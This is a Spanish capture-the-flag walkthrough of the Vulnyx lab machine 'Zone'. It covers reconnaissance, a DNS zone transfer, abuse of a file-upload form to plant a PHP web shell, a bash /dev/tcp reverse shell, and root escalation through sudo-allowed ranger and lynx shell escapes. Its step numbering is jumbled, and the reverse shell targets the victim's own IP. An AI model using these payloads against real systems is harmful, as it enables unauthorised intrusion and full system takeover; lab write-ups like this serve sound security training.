Máquina: Zone
SO: Linux
Dificultad: Easy
Link OVA: Vulnyx


img

1. Vemos hosts en la red.

sudo arp-scan -I enp2s0 --localnet

img

2. Escaneamos puertos y servicios activos.

sudo nmap -p- --open -T5 -sS -sCV --min-rate=5000 -n -Pn 192.168.1.14 -oN report

img

3. En la web Apache no se encuentra nada interesante.

http://192.168.1.14/

img

4. Descubrimos directorios y archivos.

gobuster dir -u http://192.168.1.14 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t50 -x php,html,txt

img

5. Revisamos el fichero robots. (tenemos un dominio)

http://192.168.1.14/robots.txt

img

6. Lo añadimos en nuestra configuracion de hosts.

sudo nano /etc/hosts

192.168.1.14 securezone.nyx img

7. Vamos al nuevo dominio, vemos la pagina Apache por defecto.

http://securezone.nyx

img

8. Hacemos una transferencia de zona, ya que tenemos un servicio dns.

dig axfr @192.168.1.14 securezone.nyx

img

9. Agregamos los subdominios al hosts.

sudo nano /etc/hosts

192.168.1.14 securezone.nyx admin.securezone.nyx ns1.securezone.nyx upl0ads.securezone.nyx www.securezone.nyx

img

10. Vamos revisando cada subdominio, en uploads tenemos subida de archivos.

http://upl0ads.securezone.nyx

img

11. Abrimos burpsuite y su navegador para ir a upl0ads e interceptar el tramite.

img

12. Probamos subir un archivo.

echo "hola" > file.txt

img

13. En burpsuite tenemos la peticion interceptada. Presionamos ctrl +r para enviar al Repeater.

img

14. Enviamos la solicitud para ver la respuesta. ctrl + i para enviar al Intruder.

img

15. Identificamos las extensiones permitidos.

- Seleccionamos la extension y presionamos en Add$

img

- Agregamos extensiones, luego iniciamos el ataque

img

- Se abre otra ventana, Tenemos una extension permitida

img

- Le metemos codigo php ‘malicioso’ y lo enviamos

<?php system($_GET["cmd"]);?>

img

- Fuzzeamos para ver donde se subio nuestro archivo

gobuster dir -u http://upl0ads.securezone.nyx/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -x html,php,js,txt

img

16. Vamos a la web a la nueva ruta, probamos el funcionamiento ejecutando un comando.

img

17. Ganando acceso al sistema.

- Nos ponemos en esucha

sudo nc -nlvp 443

img

- Nos enviamos una shell

http://upl0ads.securezone.nyx/uploads/file.phar?cmd=bash -c "bash -i >%26/dev/tcp/192.168.1.14/443 0>%261

img

- Tenemos la conexion a la maquina

img

19. Hacemos tratamiento de la tty.

script /dev/null -c bash

ctrl+z

stty raw -echo;fg

reset xterm

export TERM=xterm-256color

img

18. Vemos permisos sudo, podemos ejecutar ranger como usuario hans.

sudo -l

img

17. Escalamos como usuario hans

- Ejecutamos el binario

sudo -u hans /usr/bin/ranger

- Presionamos ! y enter

img

- Nos lanzamos una bash como usuario hans

/bin/bash

img

18. Revisamos permisos sudo, podemos ejecutar lynx como root.

sudo -l

img

19. Escalamos privilegios a root

- Ejecutamos el binario

sudo usr/bin/lynx

- Tipeamos ! y presionamos enter para obtener una bash

!

img

- Ya somos root

img


Finalizado.